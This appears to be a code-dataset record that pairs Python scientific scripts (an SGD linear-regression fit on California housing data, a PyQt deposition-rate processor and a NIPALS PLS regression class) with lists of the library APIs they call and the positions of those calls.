        # append to the stored arrays (not the module-level X/y) along the sample axis
        self.X = np.append(self.X, X_new, axis=0)
        self.y = np.append(self.y, y_new, axis=0)
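# --- Hedged usage sketch (not part of the original script) -------------------
# The DataLoader above is defined but never used below. This sketch shows how it
# could feed mini-batches to the optimiser; the batch size and stopping rule are
# illustrative assumptions, not the author's intended training loop.
def _minibatch_epoch_sketch(X, y, model, batch_size=32):
    loader = DataLoader(X, y)
    while loader.X.shape[0] > 0:
        X_batch, y_batch = loader.yield_data(batch_size)
        y_pred = model.predict(X_batch)
        new_w, new_b = model.optimiser.step(model.w, model.b, X_batch, y_pred, y_batch)
        model._update_params(new_w, new_b)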
#%%
np.random.seed(2)
X, y = datasets.fetch_california_housing(return_X_y=True)
scaler = preprocessing.StandardScaler()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
X_test, X_val, y_test, y_val = train_test_split(X_test, y_test, test_size=0.5)
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
X_val = scaler.transform(X_val)
np.random.seed(2)
epochs = 1000
a = 0.001
optimiser = SGDOptimiser(alpha=a, epochs=epochs)
model = LinearRegression(optimiser=optimiser, n_features=X_train.shape[1])
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
score = model.score(y_pred,y_train)
print(score)
# %%
# %%
|
[
"numpy.random.seed",
"sklearn.preprocessing.StandardScaler",
"matplotlib.pyplot.plot",
"numpy.random.randn",
"matplotlib.pyplot.show",
"sklearn.model_selection.train_test_split",
"numpy.sum",
"sklearn.datasets.fetch_california_housing",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.random.permutation",
"numpy.dot",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((3275, 3292), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3289, 3292), True, 'import numpy as np\n'), ((3300, 3350), 'sklearn.datasets.fetch_california_housing', 'datasets.fetch_california_housing', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (3333, 3350), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3360, 3390), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (3388, 3390), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3426, 3463), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (3442, 3463), False, 'from sklearn.model_selection import train_test_split\n'), ((3495, 3542), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_test', 'y_test'], {'test_size': '(0.5)'}), '(X_test, y_test, test_size=0.5)\n', (3511, 3542), False, 'from sklearn.model_selection import train_test_split\n'), ((3650, 3667), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3664, 3667), True, 'import numpy as np\n'), ((308, 325), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (322, 325), True, 'import numpy as np\n'), ((343, 370), 'numpy.random.randn', 'np.random.randn', (['n_features'], {}), '(n_features)\n', (358, 370), True, 'import numpy as np\n'), ((388, 405), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (403, 405), True, 'import numpy as np\n'), ((1470, 1482), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1480, 1482), True, 'import matplotlib.pyplot as plt\n'), ((1491, 1509), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Cost"""'], {}), "('Cost')\n", (1501, 1509), True, 'import matplotlib.pyplot as plt\n'), ((1518, 1537), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epoch"""'], {}), "('Epoch')\n", (1528, 1537), True, 'import matplotlib.pyplot as plt\n'), ((1546, 1562), 'matplotlib.pyplot.plot', 'plt.plot', (['losses'], {}), '(losses)\n', (1554, 1562), True, 'import matplotlib.pyplot as plt\n'), ((1571, 1581), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1579, 1581), True, 'import matplotlib.pyplot as plt\n'), ((1828, 1872), 'numpy.dot', 'np.dot', (['(y_pred - y_true).T', '(y_pred - y_true)'], {}), '((y_pred - y_true).T, y_pred - y_true)\n', (1834, 1872), True, 'import numpy as np\n'), ((1948, 2002), 'numpy.dot', 'np.dot', (['(y_true_mean - y_true).T', '(y_true_mean - y_true)'], {}), '((y_true_mean - y_true).T, y_true_mean - y_true)\n', (1954, 2002), True, 'import numpy as np\n'), ((2889, 2922), 'numpy.random.permutation', 'np.random.permutation', (['X.shape[0]'], {}), '(X.shape[0])\n', (2910, 2922), True, 'import numpy as np\n'), ((3213, 3232), 'numpy.append', 'np.append', (['X', 'X_new'], {}), '(X, X_new)\n', (3222, 3232), True, 'import numpy as np\n'), ((3250, 3269), 'numpy.append', 'np.append', (['y', 'y_new'], {}), '(y, y_new)\n', (3259, 3269), True, 'import numpy as np\n'), ((1084, 1101), 'numpy.dot', 'np.dot', (['X', 'self.w'], {}), '(X, self.w)\n', (1090, 1101), True, 'import numpy as np\n'), ((1328, 1352), 'numpy.dot', 'np.dot', (['errors.T', 'errors'], {}), '(errors.T, errors)\n', (1334, 1352), True, 'import numpy as np\n'), ((1919, 1934), 'numpy.mean', 'np.mean', (['y_true'], {}), '(y_true)\n', (1926, 1934), True, 'import numpy as np\n'), ((2461, 2475), 'numpy.sum', 'np.sum', (['errors'], {}), '(errors)\n', (2467, 2475), True, 'import numpy as np\n'), ((2390, 2410), 'numpy.sum', 'np.sum', 
(['(X.T * errors)'], {}), '(X.T * errors)\n', (2396, 2410), True, 'import numpy as np\n')]
|
# <NAME> and <NAME>
# Created: 6/05/2013
# Last Updated: 6/14/2013
# For JCAP
import numpy as np
from PyQt4 import QtCore
from dictionary_helpers import *
import date_helpers
import filename_handler
import datareader
# global list holding all processed (z, x, y, rate) data for the experiment
DEP_DATA = []
zndec = 1
tndec = 0
radius1 = 28.
radius2 = 45.
""" does all of the data processing necessary for deposition plots """
class ProcessorThread(QtCore.QThread):
# transfers new line from reader to MainMenu
lineRead = QtCore.pyqtSignal(list)
# transfers new processed data to deposition graph
newData = QtCore.pyqtSignal(tuple)
srcError = QtCore.pyqtSignal(int)
def __init__(self, parent=None, filename='default.csv'):
super(ProcessorThread, self).__init__()
self.file = filename
self.rowBuffer = []
self.changeZ = False
self.running = True
self.reader = datareader.DataReader(parent=self, filename=self.file)
self.reader.lineRead.connect(self.newLineRead)
def run(self):
self.reader.start()
# initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
while self.running:
pass
""" called whenever the reader sends a full line """
def newLineRead(self, newRow):
self.lineRead.emit(newRow)
self.processRow(newRow)
""" adds a new row to its own row buffer and processes the
data in the row buffer if the azimuth or z-value of the
instrument has changed """
def processRow(self, row):
if self.rowBuffer == []:
self.rowBuffer += [row]
else:
angle = round(float(row[self.anglecolnum]))
zval = round(float(row[self.zcolnum]), 2)
prevangle = round(float(self.rowBuffer[-1][self.anglecolnum]), 0)
prevz = round(float(self.rowBuffer[-1][self.zcolnum]), 2)
if (angle == prevangle and zval == prevz):
self.rowBuffer += [row]
elif (angle == prevangle):
self.processData(prevz, prevangle, radius1)
self.processData(prevz, prevangle, radius2)
# indicates that center point will need to be
# computed in next round of processing
self.changeZ = True
# reset row buffer
self.rowBuffer = [row]
else:
self.processData(zval, prevangle, radius1)
self.processData(zval, prevangle, radius2)
self.rowBuffer = [row]
""" processes all rates at the same angle and z-value
to produce a single (z, x, y, rate) data point """
def processData(self, z, angle, radius):
global DEP_DATA
rowRange = self.getRowRange()
        # only one or two data points indicate a transitional angle
        # that can be ignored - Savitzky-Golay smoothing can be used in the future
if rowRange[1] - rowRange[0] <= 2:
pass
else:
# get only valid rows from buffer
dataArray = self.rowBuffer[rowRange[0]:(rowRange[1]+1)]
# transpose matrix so that each column in the
# spreadsheet becomes a row
dataArrayT = np.array(dataArray).T
timespan = self.getTimeSpan(dataArrayT)
depRates = self.getDepRates(timespan, dataArrayT)
# normalize based on drifting center point
rate0 = self.getXtalRate(3, dataArrayT).mean()
rate = rate0
if radius == radius1:
if angle == 0 or self.changeZ:
# plot center point along with first set
# of data for this z-value
DEP_DATA.append((z, 0.0, 0.0, rate))
self.newData.emit((z, 0.0, 0.0, rate))
self.changeZ = False
x = radius * np.cos(angle * np.pi/180.)
y = radius * np.sin(angle * np.pi/180.)
# rate1 corresponds to Xtal4 Rate
rate = rate0 * depRates[2]/depRates[1]
else:
x = radius * np.cos(angle * np.pi/180. + np.pi)
y = radius * np.sin(angle * np.pi/180. + np.pi)
# rate2 corresponds to Xtal2 Rate
rate = rate0 * depRates[0]/depRates[1]
# store data points for initializing new graph
DEP_DATA.append((z, x, y, rate))
            # indicate to existing graphs that there is
# new data to display
self.newData.emit((z, x, y, rate))
""" helper function to correct for instrument noise in measuring z-value """
def roundZ(self, zcol):
zrnd=np.round(zcol, decimals=zndec)
for i, zval in enumerate(zrnd):
if zval not in filename_handler.FILE_INFO['Z_mm']:
zrnd[i] = -1
return zrnd
""" helper function to correct for instrument noise in measuring tilt """
def roundT(self, tcol):
trnd=np.round(tcol, decimals=tndec)
for i, tval in enumerate(trnd):
if tval not in filename_handler.FILE_INFO['TiltDeg']:
trnd[i] = -1
return trnd
""" gets range of valid rows in row buffer based on
whether z and t values match experimental parameters """
def getRowRange(self):
data = np.array(self.rowBuffer)
datacols = data.T
zcol = map(float, datacols[self.zcolnum])
tcol = map(float, datacols[self.tcolnum])
inds_useful=np.where((self.roundZ(zcol)>=0)&(self.roundT(tcol)>=0))[0]
# if rowRange is nonzero, send it
if inds_useful.size:
return (inds_useful[0], inds_useful[-1])
# otherwise, send dummy rowRange to processData
return (0, 0)
""" gets time span of valid data set for given angle and z-value """
def getTimeSpan(self, dataArrayT):
datecol = getCol('Date')
timecol = getCol('Time')
datetimeTup = zip(dataArrayT[datecol], dataArrayT[timecol])
startStr = datetimeTup[0][0] + ' ' + datetimeTup[0][1]
endStr = datetimeTup[-1][0] + ' ' + datetimeTup[-1][1]
durationObj = date_helpers.dateObjFloat(endStr) - date_helpers.dateObjFloat(startStr)
return durationObj.total_seconds()
""" helper function to return column of Xtal rates from valid data set """
def getXtalRate(self, ratenum, dataArrayT):
rcolnum = getCol('Xtal%d Rate' % ratenum)
return np.array(map(float, dataArrayT[rcolnum]))
""" helper function to compute all deposition rates
as time-averaged Xtal rates """
def getDepRates(self, timespan, dataArrayT):
depRates = []
for x in range(2,5):
rateData = self.getXtalRate(x, dataArrayT)
rateDiff = rateData[-1] - rateData[0]
depRates += [rateDiff/timespan]
return depRates
""" re-initializes data sets and reader when a new
spreadsheet file is loaded """
def newFile(self, newfile):
global DEP_DATA
DEP_DATA = []
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = datareader.DataReader(parent=self, filename=newfile)
self.reader.lineRead.connect(self.newLineRead)
self.reader.start()
# re-initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
""" empties row buffer and kills reader when experiment has ended """
def onEndExperiment(self):
if self.rowBuffer:
angle = round(float(self.rowBuffer[0][self.anglecolnum]))
zval = round(float(self.rowBuffer[0][self.zcolnum]), 1)
self.processData(zval, angle, radius1)
self.processData(zval, angle, radius2)
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = None
""" kills both the reader and data processor threads;
called when application exits """
def end(self):
if self.reader:
self.reader.end()
self.running = False
|
[
"date_helpers.dateObjFloat",
"numpy.sin",
"numpy.array",
"datareader.DataReader",
"numpy.cos",
"numpy.round",
"PyQt4.QtCore.pyqtSignal"
] |
[((538, 561), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['list'], {}), '(list)\n', (555, 561), False, 'from PyQt4 import QtCore\n'), ((631, 655), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['tuple'], {}), '(tuple)\n', (648, 655), False, 'from PyQt4 import QtCore\n'), ((671, 693), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['int'], {}), '(int)\n', (688, 693), False, 'from PyQt4 import QtCore\n'), ((944, 998), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'self.file'}), '(parent=self, filename=self.file)\n', (965, 998), False, 'import datareader\n'), ((5046, 5076), 'numpy.round', 'np.round', (['zcol'], {'decimals': 'zndec'}), '(zcol, decimals=zndec)\n', (5054, 5076), True, 'import numpy as np\n'), ((5349, 5379), 'numpy.round', 'np.round', (['tcol'], {'decimals': 'tndec'}), '(tcol, decimals=tndec)\n', (5357, 5379), True, 'import numpy as np\n'), ((5699, 5723), 'numpy.array', 'np.array', (['self.rowBuffer'], {}), '(self.rowBuffer)\n', (5707, 5723), True, 'import numpy as np\n'), ((7523, 7575), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'newfile'}), '(parent=self, filename=newfile)\n', (7544, 7575), False, 'import datareader\n'), ((6526, 6559), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['endStr'], {}), '(endStr)\n', (6551, 6559), False, 'import date_helpers\n'), ((6562, 6597), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['startStr'], {}), '(startStr)\n', (6587, 6597), False, 'import date_helpers\n'), ((3592, 3611), 'numpy.array', 'np.array', (['dataArray'], {}), '(dataArray)\n', (3600, 3611), True, 'import numpy as np\n'), ((4242, 4271), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4248, 4271), True, 'import numpy as np\n'), ((4298, 4327), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4304, 4327), True, 'import numpy as np\n'), ((4477, 4514), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4483, 4514), True, 'import numpy as np\n'), ((4541, 4578), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4547, 4578), True, 'import numpy as np\n')]
|
from __future__ import print_function
import numpy as np
from ._PLSbase import plsbase as pls_base
from .utilities import nanmatprod, isValid
from .engines import pls as pls_engine
class pls(pls_base):
"""
This is the classic multivariate NIPALS PLS algorithm.
Parameters:
X: {N, P} array like
a table of N observations (rows) and P variables (columns) - The explanatory variables,
Y: {N, Q} array like
a table of N observations (rows) and Q variables (columns) - The dependent variables,
        ncp: int
            the number of PLS components to be fitted
scaling: float, optional
            A number typically between 0.0 and 1.0 corresponding to the scaling; typical examples are
0.0 corresponds to mean centring
0.5 corresponds to Pareto scaling
1.0 corresponds to unit variance scaling
cvfold: int, optional
the number of folds in the cross-validation - default is 7
Returns
-------
    out : a pls object with the following attributes and methods
Attributes:
W : PLS weights table
T : PLS scores table
P : PLS loadings table
C : PLS score regression coefficients
B : PLS regression coefficients
Yhat: model predicted Y
Yhatcv: cross-validation predicted Y
R2Y: Determination coefficients of Y
        Q2Ycol: Cross-validation parameters per column of Y
Q2Ycum: Cumulative cross validation parameter
Methods:
scores(n), loadings(n), weights(n)
n: int
component id
return the scores of the nth component
predict(Xnew)
Xnew: array like
                new observations with the same number of variables as X
return predicted Y
"""
def __init__(self, X, Y, ncp=1, cvfold=None, scaling=0):
pls_base.__init__(self, X, Y, ncp=ncp, scaling=scaling, cvfold=cvfold)
self.model = "pls"
missingValues = False
if self.missingValuesInX or self.missingValuesInY:
            # TODO: For now missing values in both X and Y are dealt with in the same way -> Improve this
missingValues = True
self.T, self.U, self.P, self.W, self.C, self.B = pls_engine(self.X, self.Y, self.ncp, missing_values=missingValues)
self.Wstar = self.W @ np.linalg.inv(self.P.T @ self.W)
self.Yhat = self.predict(self.X, preprocessing=False)
self.R2Y, self.R2Ycol = self._calculateR2Y(self.Yhat)
self.cross_validation(ncp=ncp)
self.R2X = np.sum(np.square(self.T @ self.P.T))/self.SSX
def predict(self, Xnew, preprocessing=True, statistics=False, **kwargs):
Xnew, nnew, pxnew = isValid(Xnew, forPrediction=True)
if preprocessing:
Xnew = (Xnew - self.Xbar)
Xnew /= np.power(self.Xstd, self.scaling)
assert pxnew == self.px, "New observations do not have the same number of variables!!"
if statistics:
That = Xnew @ self.W
Xpred = That @ self.P.T
Xres = Xnew - Xpred
Xnew2 = np.square(Xres)
if np.isnan(Xnew2).any():
ssrx = np.nansum(Xnew2, axis=0)
else:
ssrx = np.sum(Xnew2, axis=0)
stats = {'That':That, 'ESS':ssrx}
if self.B is not None:
# Yhat = Xnew @ self.B
if self.missingValuesInX:
Yhat = nanmatprod(Xnew, self.B)
else:
Yhat = Xnew @ self.B
if preprocessing:
Yhat = Yhat * np.power(self.Ystd, self.scaling) + self.Ybar
else:
Yhat = None
if statistics:
return Yhat, stats
else:
return Yhat
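# --- Hedged usage sketch (not part of the library) ----------------------------
# A minimal example of fitting this class on synthetic data. The attribute names
# follow the docstring above; the relative imports at the top of the module are
# assumed to resolve, i.e. this is run in the context of the installed package
# (e.g. via `python -m <package>.<module>`), not as a standalone script.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    Xdemo = rng.randn(50, 10)
    Ydemo = Xdemo[:, :2] @ rng.randn(2, 3) + 0.1 * rng.randn(50, 3)
    model = pls(Xdemo, Ydemo, ncp=2, cvfold=7)
    print("R2Y:", model.R2Y)
    print("Predicted Y shape:", model.predict(Xdemo).shape)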
|
[
"numpy.nansum",
"numpy.sum",
"numpy.power",
"numpy.square",
"numpy.isnan",
"numpy.linalg.inv"
] |
[((2506, 2538), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.P.T @ self.W)'], {}), '(self.P.T @ self.W)\n', (2519, 2538), True, 'import numpy as np\n'), ((3002, 3035), 'numpy.power', 'np.power', (['self.Xstd', 'self.scaling'], {}), '(self.Xstd, self.scaling)\n', (3010, 3035), True, 'import numpy as np\n'), ((3285, 3300), 'numpy.square', 'np.square', (['Xres'], {}), '(Xres)\n', (3294, 3300), True, 'import numpy as np\n'), ((2728, 2756), 'numpy.square', 'np.square', (['(self.T @ self.P.T)'], {}), '(self.T @ self.P.T)\n', (2737, 2756), True, 'import numpy as np\n'), ((3367, 3391), 'numpy.nansum', 'np.nansum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3376, 3391), True, 'import numpy as np\n'), ((3433, 3454), 'numpy.sum', 'np.sum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3439, 3454), True, 'import numpy as np\n'), ((3321, 3336), 'numpy.isnan', 'np.isnan', (['Xnew2'], {}), '(Xnew2)\n', (3329, 3336), True, 'import numpy as np\n'), ((3788, 3821), 'numpy.power', 'np.power', (['self.Ystd', 'self.scaling'], {}), '(self.Ystd, self.scaling)\n', (3796, 3821), True, 'import numpy as np\n')]
|